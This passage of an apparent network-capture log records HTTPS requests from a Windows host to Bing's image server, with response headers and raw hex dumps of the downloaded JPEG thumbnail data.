2024-11-23 06:09:23 UTC	16384	IN	Data Raw: f7 49 44 0d fb ef 9e 99 4f d9 40 d3 68 bb fb b9 69 d3 ac 0b 0f c9 54 37 d1 ba 4a cf d9 f9 9b aa ba 3d 09 e4 9e a0 92 7a 65 15 6a 29 19 3a 8d 8f 76 a8 a9 d4 53 25 b6 c6 d1 4e a2 81 11 ed 34 54 9b 69 b5 5c c0 36 8a 76 da 2a 40 6d 1b 4d 3b 6d 14 d3 b0 0d da 6a 48 3c bf 27 e7 a6 fd ff 00 92 b4 74 7d 2b cd f9 ee bf 77 1d 4d 49 a8 c7 53 4a 70 94 e5 a2 2d d8 e9 92 3c 3e 7c 1f bc 8e af 7f c2 3d 04 b0 ef 83 fd 67 fc f3 aa 77 5a 87 d9 e6 f2 2d 7f 77 e5 d3 7f b4 2e d2 6f f5 d5 c1 28 d6 96 a9 9e ac 5d 08 7b b2 57 27 b5 d2 3e cf 36 c9 e9 f7 da 44 6f e6 6c f2 64 92 3a cf be d4 e7 b8 fb f3 55 59 ee 77 fc e9 34 de 65 5c 69 d5 93 bd c8 95 5c 3a 56 4b 42 39 e2 8d 3e 4a a5 b2 ae cf 2c 97 1f 3c 9f eb 2a ae d3 5d b0 ba 5a 9e 6d 5b 5f 41 9b 29 79 a7 6d 34 e8 22 92 69 a3 44 ff Data Ascii: IDO@hiT7J=zej):vS%N4Ti\6v@mM;mjH<'t}+wMISJp-<>\|=gwZ-w.o(]{W'>6Dold:UYw4e\i\:VKB9>J,<]Zm[_A)ym4"iD
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 91 cf df 5b 6a 51 4d 27 91 37 d8 bc b9 26 92 49 3f e7 a2 7d ff 00 fb ea ba 58 2c 7f e2 99 fd c7 93 24 ff 00 eb 3c c9 7f ef af 9a 9f 63 3d 85 a5 a7 fa 54 3f 68 9f fd 5f fb 1f 37 f1 6d ab 93 f8 87 fe 5c ac ac e2 8e 09 3f d1 e4 fe 3b 9f fa 69 fe e7 bd 63 26 dd ac 5c 79 53 bd ce 7f 4d b3 9e ef cc 9d 34 7b b9 3c bd 9e 5f ee b6 26 cf f6 7f dd a8 6d 56 fd f5 69 12 f6 cf cb 92 4b 9f f9 eb 47 8b b5 cb 48 a6 b6 d9 af 45 1d d7 c9 e6 79 52 ff 00 7b fb bb 6b 2f 49 d4 34 2b 4f 10 fd aa 79 b5 0b 8d 36 ca 4f 32 4f dd 7f ac f2 ff 00 89 aa 94 64 d6 a4 ca 71 e6 b1 cf fc 7a 82 77 f1 e5 b6 89 04 df 68 9f e4 8e 49 22 97 7f cf fc 55 d4 5d 45 1d be 9f 63 6b 3d 9f ee e4 8f cc 92 49 7e ff 00 cb f2 d6 4f 81 f5 c8 35 2f 13 5f 78 86 0d 07 f7 ff 00 6d fd df da 7f e7 94 9f e7 8a 77 88 Data Ascii: [jQM'7&I?}X,$<c=T?h_7m\?;ic&\ySM4{<_&mViKGHEyR{k/I4+Oy6O2OdqzwhI"U]Eck=I~O5/_xmw
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 77 e6 ff 00 66 bc 03 58 d5 75 6b 7d 3e 5f 0b cf 37 97 1c 77 2f f6 9f de ff 00 c7 fd d4 6f fe b3 fe 03 da bd 5f e1 2e a1 3c be 08 b6 d5 35 7f f5 f6 fb e3 b6 f3 7e fc e8 bf de dd 5c 58 8c 3b e4 55 6f a7 44 bb 1e de 12 ad 28 d5 74 d2 e9 76 df 73 ba f1 06 b9 a2 e8 9a 1f f6 76 9d 34 de 7f 97 fe b2 28 bf 8f fd e6 f5 af 33 f1 36 95 77 aa f9 8f 75 79 77 71 aa fc 91 fd a6 5f b9 ff 00 01 4a d4 d4 b5 38 2f 66 fb 54 ff 00 e8 f6 b1 ff 00 ab 92 2f b9 be b9 db ad 6a 04 86 e6 ea d6 69 a4 92 3f f5 9e 6f fc b4 4a 78 6a 2e 1a a7 a9 a6 2a bc 27 ee cf 63 3f 4a f0 85 fb f8 9a da c9 ef 3e cf 25 bc 9e 64 92 45 ff 00 2c d3 fd ef bb 5e a1 a5 78 4f 42 f0 e6 9f 73 75 7b 37 db 6d 63 92 6f b1 5b 5f 7f 7e 4f f5 9b bf bd ed 5c 86 95 a9 d8 78 53 49 91 ed 7c 99 35 2b 88 d2 49 3c df 9f ef Data Ascii: wfXuk}>_7w/o_.<5~\X;UoD(tvsv4(36wuywq_J8/fT/ji?oJxj.*'c?J>%dE,^xOBsu{7mco[_~O\xSI\|5+I<
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: a9 e5 51 c4 41 c6 a3 d0 f9 ae eb c1 37 7a 7e 9f b2 7f dd cf 7b fb bb 9f 37 fe 59 a7 f7 3f fb 2a c4 f1 06 91 69 a5 68 77 3f 65 86 18 e7 b8 8f cb 92 4f e3 8e bd 07 e2 c6 af a4 e9 fe 21 b9 b5 82 6d 5a de ea 3d ff 00 69 bd b9 9b 7f 99 fe ef 4a e0 6f 97 c3 d7 77 71 ef f1 25 de 9d 3d c4 7e 5c 9f 6e 89 1f fa d7 d1 e1 6b 4e a2 8d 49 ed be c7 cc e2 f0 d4 a2 e7 4e 92 57 db 7f c8 f3 9d 5d 35 6b 58 a3 8e 7f 3a 48 e3 93 fd 1f fb 95 4a f9 a7 97 e7 92 6f 9f fe 9a 57 a6 df 68 77 70 f8 7b f7 f3 43 ad 69 bf f2 cf ec d7 7f 66 9a df fe d8 bf de ae 2f 5c f0 fc 9e 54 77 b6 b0 cb 1d ad ce ff 00 2e 39 65 f9 e3 ff 00 65 eb d6 a3 8c 84 df 2d cf 13 11 97 d4 a3 69 5b 4f eb e4 50 85 7c ab 48 ed 7f d6 47 27 ef 3f 79 15 4b 04 12 2f ef 9f f7 91 f9 7e 5f fb 74 6d 91 26 8e 09 ff 00 77 27 Data Ascii: QA7z~{7Y?*ihw?eO!mZ=iJowq%=~\nkNINW]5kX:HJoWhwp{Cif/\Tw.9ee-i[OP\|HG'?yK/~_tm&w'
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: fb fb 52 5f 41 a9 c3 63 aa 41 fb cf f4 9f b3 d9 7f b9 fc 7f 9d 7b 0f c5 8d 56 7d 1f e1 ee ad 7b 65 ff 00 1f 5e 5f 97 1f fb f2 7c 95 f3 b7 8e 27 82 ef c1 be 17 4b 5f 3a 4f 2e 37 f3 3f 8d fe e5 76 60 e2 fd a4 65 e6 70 e3 e6 96 1e 71 eb 65 f8 b4 79 ce ad 04 0f e6 4f e4 ff 00 d3 4a ce f0 5e c8 b5 1d 4a ca 4f f9 e6 92 47 1d 77 33 db 41 6f 0c 9f f2 cf f7 7f eb 3c aa e7 fc 2b 14 17 ba e5 cb a7 ef 2e a4 8f f7 72 7f ba f5 ef 29 7b ac f9 59 72 aa aa ca db 94 2e a0 93 ec 9f f2 c6 48 ff 00 e5 9f 9b 15 64 4f f3 cd b3 fd 5f 97 fe af ca ae a3 c4 76 72 2c d1 a2 7f b7 59 df 61 ff 00 44 93 fe 59 d5 29 e8 39 43 b1 cc c6 c9 e7 6f 7f dd ff 00 d3 4a ab 75 f2 56 94 eb fe 89 1f 97 fb cf 33 f7 92 45 ff 00 d9 56 36 b4 df bb 93 f7 df 3f dc f2 eb a7 98 e7 8c 5b 76 0d 2e 3f 2a 2f 3b Data Ascii: R_AcA{V}{e^_\|'K_:O.7?v`epqeyOJ^JOGw3Ao<+.r){Yr.HdO_vr,YaDY)9CoJuV3EV6?[v.?*/;
2024-11-23 06:09:23 UTC	16067	IN	Data Raw: ee d3 3c 47 a9 5d e9 5f 0f 63 d4 35 7b cf ed 19 2f 64 ff 00 49 8e e7 67 db 2e 3f d9 f2 bf 82 a9 a4 9a 44 a7 cc 9d d9 14 9a 66 a5 a8 5a 5f 3f 86 ac ed 34 eb 59 24 f3 23 d4 b5 2f dc cd 27 95 fd e8 ff 00 da fe 1a e0 6c 7c 3d 7e fa 84 9e 7e a5 69 27 97 bf f7 92 ef d9 f3 56 a5 8f 8c 63 b4 bb 8e d7 4b 9a ee 48 ec b7 f9 92 4b f7 24 dc fe 63 2e df ee ee ac bb ad 7a 4b 8d 42 4d 9f ea e4 df 27 fd f5 fd da ec a3 15 1d 59 c5 52 4e 5a 24 32 48 23 d3 ed 36 41 e4 c9 27 cf 1f fa af ef 7f 1d 41 75 6d b2 ee 47 49 a1 f3 3c af f5 72 fd ca 87 55 be 81 ed 23 df 34 d1 f9 7f ea e4 a8 2e af 3f d5 bb ff 00 ac ff 00 57 e6 79 5f 3d 74 a9 26 72 f2 c9 3d 49 64 b6 b4 97 f7 fe 77 d9 e4 fb 37 fa b8 be 7f 32 a8 7f a7 5c 43 f6 a9 a6 8b fd 67 ee fc da 9e 49 77 e9 f2 3f ee 64 f2 ff 00 77 59 Data Ascii: <G]_c5{/dIg.?DfZ_?4Y$#/'l\|=~~i'VcKHK$c.zKBM'YRNZ$2H#6A'AumGI<rU#4.?Wy_=t&r=Idw72\CgIw?dwY
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: ac 9f e8 7a 5f 80 1e ff 00 ec 91 cf a7 7d ae 4f 32 4f 2f fd 56 cf bb f7 64 f9 eb 72 0f 0f 4f a8 78 86 c7 54 d5 35 2b b9 3e cf be 3f b3 4b 2f fa 36 f6 fe 29 11 7e fd 57 f0 fe a1 25 ec 3f 6a d3 ac e6 b2 fb 3d b7 97 1c 72 ec ff 00 c7 ff 00 bd fd dd b5 2f 87 20 8e d2 19 35 47 9b fe 3f 64 7b 8b df 2a d3 62 79 bf 75 db 7f f7 47 dd ac 5d d3 65 ab 34 91 43 c7 12 d8 4b a8 47 75 3c df 62 83 cb f2 e3 b9 96 2f b4 a4 9b be 5f 96 b2 ec 6f 2d 1e 1b 6d 5d e6 86 39 2f 63 4f b4 c9 14 5e 4a 49 bb e7 dc ed ef b7 e6 ab 1e 3f be 8e 5f 01 e9 a9 a5 cd a7 f9 7a d4 9e 64 7f f4 d2 de 4f ee ff 00 5f ee d7 07 1f 8b 34 2d 2a 6b 64 b5 87 ed b2 5e c9 f6 b9 2c ac 76 6c f2 a3 74 dd 27 fb 52 7e ef e5 fe f5 6d 4e f2 5a 13 55 ea 99 d9 78 71 bf b5 7c 3d 6c 97 5a 94 d2 5a dc 6c 93 fd 1a d3 65 Data Ascii: z_}O2O/VdrOxT5+>?K/6)~W%?j=r/ 5G?d{byuG]e4CKGu<b/_o-m]9/cO^JI?_zdO_4-kd^,vlt'R~mNZUxq\|=lZZle
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 91 ef 74 ff 00 2b 54 23 d1 0c be 64 cf e5 5b c7 e5 ff 00 df ca 66 f9 22 f3 1f ce ba f2 fe e4 9f bd d9 bf fe 03 50 43 ac ea 76 93 49 b2 ef cc 92 4f 93 cc ff 00 f6 ab 39 35 d4 da 0a a5 ad 16 45 7d a7 c7 17 96 f0 cd e6 24 9f f3 cf f8 2a 86 df e3 86 6f fb f9 5b 36 fa d4 91 79 90 c3 14 51 fd a2 37 8e 49 3c af ef 53 6f f5 0b 07 ba f3 23 d2 61 b7 7f 2f f7 9e 5f dc ac da 5d 0d e1 29 f5 46 1b c4 ff 00 7f ca a8 de b4 ae ee 7c d8 b7 d4 1f 23 7c ef e5 7e f2 b3 e5 46 d1 9b 6b 54 36 d3 50 ba b7 87 64 52 fc 95 a5 6b a8 5d 4b 67 24 9f 6a 8f cf ff 00 96 71 f9 55 8f e5 6e fb 95 2a 45 bb ee 52 8c 9a 56 14 e3 07 a9 62 7d 6a 77 9b e4 9b cb a8 64 9e f2 4f f9 7a 96 4f fb 6b 51 f9 5b 7e fc 35 0c 6b e5 7d fa 57 9f 52 d4 61 d1 0d ff 00 6f f8 e8 a5 dd bb e7 f2 be 4a 2b 3b 96 7d 21 Data Ascii: t+T#d[f"PCvIO95E}$o[6yQ7I<So#a/_])F\|#\|~FkT6PdRk]Kg$jqUnERVb}jwdOzOkQ[~5k}WRaoJ+;}!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49733	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:22 UTC	346	OUT	GET /th?id=OADD2.10239370639703_1XZVEAKL3PD7EZGL4&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:23 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 637660 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 152F9C0727374967923AC3D326EBE48F Ref B: EWR30EDGE0711 Ref C: 2024-11-23T06:09:22Z Date: Sat, 23 Nov 2024 06:09:22 GMT Connection: close
2024-11-23 06:09:23 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1d dc 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 32 38 3a 34 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:28:408
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 05 c2 c0 b0 c7 c2 c6 ab f3 31 f7 af 23 11 9a 53 8d d4 59 ec 50 cb 27 a3 99 e6 9f 0b 7e 15 dc ea 97 8b 77 a8 ed 58 63 6f f5 6c bf 7a bd 66 db e1 4f 86 a1 86 59 3f b3 e3 69 a5 5c 6e fb db 7e 82 bb ed 3f 4f 82 38 56 38 95 57 77 fc f3 ab ab 66 b1 af c9 d6 be 7b 11 98 55 a9 2b de c7 b3 47 0b 4e 9c 6c 91 e3 1a 6f c1 9d 00 ea 12 47 35 8c f2 47 bb e5 66 6a ec bc 2b f0 bf 43 d0 d7 fd 1a 05 f5 56 65 e7 f3 ae ce 45 78 f9 4e b5 2c 6e 7c bf 9f e6 35 cf 3c 5d 69 ab 39 33 58 d2 82 d9 1c cc de 17 d2 a3 9a 4b 97 b6 8d 99 b8 69 19 77 35 3b 4f d0 ac 85 d4 77 11 c7 b7 cb ad eb c1 e6 43 f2 2f 35 42 3d 42 de dd 96 09 65 55 3f ed 56 7c f3 6b 72 ac 91 d0 69 b2 8d aa 82 b4 a1 96 b9 88 ef c4 4d e6 2b 6e 8e ae e9 ba b4 57 3c c6 fb b6 d6 12 83 dc a4 74 b0 cb 9a b7 1c b5 91 6d 2e 6a Data Ascii: 1#SYP'~wXcolzfOY?i\n~?O8V8Wwf{U+GNloG5Gfj+CVeExN,n\|5<]i93XKiw5;OwC/5B=BeU?V\|kriM+nW<tm.j
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 6e 6b 72 cb 8a c5 d4 d7 42 94 6e 71 f7 e4 bb 63 6f 3f de aa 13 5b 33 f4 ae d5 f4 bc f2 eb ba 96 1d 32 33 fc 35 4a aa 27 95 9c 03 69 f3 bb 63 6d 5a b5 d0 2e 24 e7 6b 57 a0 db e9 90 22 ff 00 aa a9 a4 86 da de dd a5 b8 96 38 22 5f bd 24 8c 15 7f 33 4f db b7 b0 f9 12 dc e0 24 d0 a4 45 ce da 8e da c3 62 b4 8f fb b8 e3 5c b3 37 dd 5a 9b e2 07 c5 4f 87 9e 1b 69 6d e7 d6 a3 bc bb 8f 8f b2 58 fe f1 f3 ee 7a 0f ce bc 03 e2 67 c5 fb ff 00 10 dd 34 76 cb f6 5b 05 6f dc db 46 df 7b fd ff 00 ef 1a eb a3 46 b5 4d 5a d0 c2 a5 58 47 a9 ec 3a f7 8b 34 2d 36 dd 8c 53 fd aa 5e 8a b1 fd dc fb 9a e0 35 5f 1d 1b 8b e6 8d a7 55 3f f3 cd 7e 55 af 27 be d7 ae 27 8f 74 8c ca 7f 85 77 7c b5 8d a8 5d c8 ec a4 37 3f de af 46 9e 13 b9 c7 3c 43 b1 eb 3a e6 bb 1c 71 f9 b2 6d 6e fb a8 af Data Ascii: nkrBnqco?[3235J'icmZ.$kW"8"_$3O$Eb\7ZOimXzg4v[oF{FMZXG:4-6S^5_U?~U''tw\|]7?F<C:qmn
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: d3 ad 46 cb 8a 62 2b b2 d2 32 d4 ce b4 d6 14 01 03 2e 7e 5a 7c 7a 7d d4 ed 20 82 da 79 0c 7f 7b cb 8c b6 da df f8 7f a1 4f ad 6b 51 a4 4b e6 08 d8 1d bb 6b e8 df 0c f8 5f 4c b0 d3 76 45 6d 1a 99 39 91 95 7e 66 35 e5 e3 b3 28 e1 9a 8a 57 67 a5 85 c0 fb 58 f3 49 d9 1f 3b 78 2f c0 1a be af 79 24 73 d9 b4 41 57 e5 8e 4e 1b ff 00 ad 5a da bf c1 7f 10 5b 59 b5 cc 57 36 d2 6d 52 7c a5 ce ea fa 2a c3 4e b7 b4 8d 84 11 2a ee e5 a8 bf b5 f3 ad 5a 23 f2 ee af 16 79 cd 77 2b c7 44 7a 31 c0 d0 4a cd 1e 5f fb 37 ff 00 6f da 69 f7 3a 66 af 17 97 6f 04 98 8b fb d5 eb b6 31 e1 b3 f7 85 65 59 d8 88 76 c5 1a aa 8a dd b3 8f 6c 6a 3f bb 5e 65 6a 9e d6 a3 95 ad 73 a9 45 42 0a 24 eb f7 68 53 4e a8 dc 81 50 22 1b 83 f3 53 d9 7f 77 51 33 a1 6c 1a 91 58 79 7f 7b 8a 43 2a fd 9c 19 Data Ascii: Fb+2.~Z\|z} y{OkQKk_LvEm9~f5(WgXI;x/y$sAWNZ[YW6mR\|NZ#yw+Dz1J_7oi:fo1eYvlj?^ejsEB$hSNP"SwQ3lXy{C*
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: ef 55 66 b4 b2 dd e5 45 7c ab 24 72 66 4f dd ee 56 34 93 59 db dd 48 d7 51 4e d1 2c 5f bb 8e 35 8b ef 3f ad 51 41 b5 96 2b d6 d8 bf c2 b1 c7 f3 31 f4 27 d2 88 45 5d b8 b1 cd bb 59 9b fa 55 cd bc 50 c9 6a b2 f9 90 c7 93 fb a5 3b b7 ff 00 2a ae d6 ba ad c5 e4 86 09 56 d6 2e 07 76 6e 9d 07 a9 fa 56 8e 8b 10 86 e2 da c2 d3 cc 79 24 5d fb 95 7e 5f cc ff 00 3a f1 ad 63 e3 16 a3 a6 7c 44 92 31 03 41 a6 59 ca d1 c9 03 36 f9 18 83 82 c5 bd 7e 9c 57 2c f1 10 a7 27 6d cd 23 4a 52 5e 47 b1 68 7a 24 9a 8f 88 13 4f 96 79 25 b7 8b 12 5c ee 5d a5 40 f4 f4 f4 ae 92 ce 5b 3b 5f 10 46 fe 54 76 6d e6 6c b4 f2 a3 df b4 1e ad b7 bb 76 19 ae 47 e0 7f 8e bf e1 32 f1 45 d2 68 10 49 1d a4 56 c4 fe fd 42 b4 d2 1e e4 f6 51 5e a3 e1 bb 6b 2f b6 2d fc 76 6a d2 aa 97 92 e7 cc dd f3 8e Data Ascii: UfE\|$rfOV4YHQN,_5?QA+1'E]YUPj;*V.vnVy$]~_:c\|D1AY6~W,'m#JR^Ghz$Oy%\]@[;_FTvmlvG2EhIVBQ^k/-vj
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: a8 2e 2d b6 cb 1e 36 b3 2f dd 1f e3 44 6f 2d 56 c5 3b 27 a9 61 a0 94 da af 96 aa b1 aa fd d5 f9 77 7e 75 4b 4c b6 bb 9e f9 a5 9e 5d b0 c7 93 23 6e fb de c2 ae 34 2c 1b cd bc f3 31 1b 13 fd ed c6 b4 33 6c 2c 55 ef 11 97 73 7c b0 fd dd c3 d0 e3 fa 52 73 e5 0e 5b b3 3e c2 cc bc 32 dc 09 64 8f fd af ee 8f 4f c6 aa 5c 80 cc c9 26 dc 37 dd dd f7 ab 7f 50 6b 6b 2d 2d 5e 75 58 37 36 63 89 7e 66 c7 ad 60 6b 57 76 90 b2 f9 10 2f 9d b7 2b bb 3f 37 a7 5a 74 9b 93 1c d2 48 86 48 22 95 58 18 97 e5 ff 00 81 55 06 e2 4f 2e 4d cb f3 6d 56 6f bb c5 69 47 22 36 d9 ff 00 b4 16 49 36 e7 6f 96 55 79 f7 f6 a8 52 72 d3 34 b3 ee 90 2f 3f 77 e5 fc eb a6 2d 98 15 2e 9a 49 db 11 4a ca 23 5a 29 8e c4 5c 34 83 e5 8b fb df c3 45 5d 89 bb 3e d3 48 e9 e9 16 69 f7 2f 6f 67 63 2d e5 e4 eb Data Ascii: .-6/Do-V;'aw~uKL]#n4,13l,Us\|Rs[>2dO\&7Pkk--^uX76c~f`kWv/+?7ZtHH"XUO.MmVoiG"6I6oUyRr4/?w-.IJ#Z)\4E]>Hi/ogc-
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 2c 56 28 e3 8f 1f bb 6d ad f5 af 4a 71 a9 ca 94 4e 4a 6e 0a 5e f1 9f aa 69 92 4c b3 dc da 4b 1c 71 33 7d d6 90 6e 6f c2 a3 d2 e7 b3 b6 b3 50 6f a7 8e 46 e1 97 6f c9 d7 f5 35 46 49 9f ed 1c 33 36 e6 f9 7f bd cd 5a bf d2 fc 98 63 94 de 40 d2 49 83 e5 45 f3 6d 1e e6 b7 e5 f7 79 66 cc 23 2f 7b 9a 27 55 e2 c9 24 8b 4d b5 b8 8a 06 f2 f6 63 cd 66 1b 98 7a 7a d7 17 78 8e dc 47 2b 65 bf 87 fb d5 d0 47 a0 eb 66 38 be d2 de 45 bb 47 be 49 65 63 b6 31 db f1 3e 95 91 7d 0a 43 71 e5 24 be 60 e9 e6 2f f1 54 61 b9 63 a2 77 2a b3 72 d6 c5 68 c3 ab 60 ab 29 fe f5 49 70 b1 ca b8 db b8 ff 00 7a 9b 82 1b 86 a7 ad b5 c3 db c9 3a 44 cd 0a b7 cd 22 fd d5 3f 5a ea ba 31 b3 7b 15 9e 20 8d ca f1 56 ac a3 b4 13 28 b8 66 58 db fb bf e7 8a ab 31 fd de c2 df ee d5 8b 38 ed da 16 49 59 Data Ascii: ,V(mJqNJn^iLKq3}noPoFo5FI36Zc@IEmyf#/{'U$McfzzxG+eGf8EGIec1>}Cq$`/Tacw*rh`)Ipz:D"?Z1{ V(fX18IY
2024-11-23 06:09:23 UTC	16065	IN	Data Raw: 55 8b b5 cc b1 15 5f a8 26 ba 0b 79 6d f4 bd 2e 5b b2 d2 49 71 3b 17 97 77 dd 51 d0 74 e7 15 72 39 ae 2f 2f 1a 78 e0 5f b2 5b 7d d6 5f 95 73 db 1d ab 12 e2 fa 2b 9f b6 5b 5f ca aa 3e ee ef ef 7a d6 52 93 aa f6 29 a5 08 da e5 8b 39 20 7b 55 d5 07 97 10 97 ee b6 d0 a7 ea 2b 3a 47 82 69 2e 7c d9 e3 cc 5c c7 22 e1 df 27 b2 e7 af e1 52 5d 18 35 0b 3f b1 69 16 db 62 6e 3c c9 3e e2 e3 fa fb 54 3e 1e d0 22 b7 d7 15 12 29 24 66 5f 9a 46 fa 72 54 76 ad 22 a3 14 db 7a 91 2e 69 59 2d 89 3c 1b 77 71 6b 6b 75 1b b3 7e fd b3 17 9a bf 33 67 8e 58 ff 00 4a 4d 61 d2 4b 5b a0 65 81 a4 b6 61 e5 45 b7 6a ae 7b e7 f8 8d 33 54 d5 34 bb 79 25 95 6d a4 fb 54 5f 27 cc db 97 ae 00 1f 95 57 f1 39 fb 65 af 99 23 2c 07 ca 1f 75 77 75 ec bf e2 6a a3 16 e6 a5 6b 5c 5c fc b1 6b 73 9b d5 Data Ascii: U_&ym.[Iq;wQtr9//x_[}_s+[_>zR)9 {U+:Gi.\|\"'R]5?ibn<>T>")$f_FrTv"z.iY-<wqkku~3gXJMaK[eaEj{3T4y%mT_'W9e#,uwujk\\ks
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: fd e9 24 2d 23 67 dc f4 1d b1 47 c2 fd 3b 4f d5 b5 c9 23 bd 81 64 58 a2 32 6d 6f bb 91 eb 59 c2 75 29 46 73 aa ee 91 a4 94 66 e2 a0 6a fc 3f f0 d5 9b d9 ae b7 7b 3c 92 96 94 79 51 c6 bf 74 77 c9 3d eb b2 b3 d2 6c 9b 54 96 78 ac ed a2 95 54 18 d9 be 6f 2f dd 89 ef 53 3c 91 4b 62 be 64 b2 2c 31 63 6a ed d9 bb fd d1 d0 55 c6 df f6 55 16 71 2c 45 b9 66 da 5d 57 3e a7 ab 63 d2 be 77 13 8a a9 52 4d be a7 6d 3a 71 8c 6c 91 16 ac 44 b2 5a de 47 b9 7c b6 c3 34 4b fc 62 aa aa db db 5b c9 79 24 5e 6c b2 c9 fb a8 a5 fb ab 9e a4 f7 62 6a cc 97 b3 da 69 f7 26 05 9d 56 08 c9 8f cc 50 ad 21 c7 e4 05 63 e9 f7 91 b6 9b 26 aa f2 b4 72 34 58 5d cb f3 64 fd 6b 28 41 b8 ea 6d ca 97 a9 b4 8d 68 d3 47 72 5b 85 88 85 8d 57 77 3f c5 f4 15 c9 eb 62 7b 5d 3f 50 95 99 77 2c 67 ca f2 Data Ascii: $-#gG;O#dX2moYu)Fsfj?{<yQtw=lTxTo/S<Kbd,1cjUUq,Ef]W>cwRMm:qlDZG\|4Kb[y$^lbji&VP!c&r4X]dk(AmhGr[Ww?b{]?Pw,g
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 1e b8 c7 af ad 43 e4 5b dc ea d7 57 e7 74 92 ae 02 c5 1c 63 f7 64 75 f9 9b b9 ef 8a f8 bc 2d 49 c2 77 5a 2b 58 f4 b9 9c 5d 89 6e 34 3d 13 49 b7 83 46 b6 9e 08 2c ed d7 12 49 13 07 66 90 f5 07 fd ac d7 29 75 a4 25 94 93 db c5 aa c1 1b 5c c8 0a c7 c2 26 07 73 8f bd 57 e6 36 7a c5 d4 ba 65 96 9e d2 5c 33 07 69 65 ce c8 c7 f2 cd 67 eb 6f 20 f1 04 76 96 f0 2c f3 46 a1 e4 65 8c 32 e0 7e 1c 2d 75 46 35 5b e5 93 d5 ea 62 f7 b9 b3 12 2d ae 86 d2 5c 5e 2d e1 59 02 6d 8d 43 2c 63 dc f7 a8 f5 ed 42 28 34 b6 78 20 f3 da 49 14 2a ee fb c6 ab 78 09 35 8d 7b 4b 69 24 b6 6d d7 d7 66 d6 d2 35 5f 99 80 7f 9e 4e c1 54 0a da d6 f4 3d 0a cb e2 12 d8 59 5c c9 3b 5a a8 31 a7 de 1b f1 82 c7 f1 ae 4e 5a d0 9b 6e 3b 32 ad 26 ae 70 3f 1b af 4e 91 71 a1 d9 5b 6e 92 4b 9b 95 f3 24 65 Data Ascii: C[Wtcdu-IwZ+X]n4=IF,If)u%\&sW6ze\3iego v,Fe2~-uF5[b-\^-YmC,cB(4x I*x5{Ki$mf5_NT=Y\;Z1NZn;2&p?Nq[nK$e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49731	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:22 UTC	375	OUT	GET /th?id=OADD2.10239370639702_1LY06F7YB2ZF9D3G5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:23 UTC	861	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 634564 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, 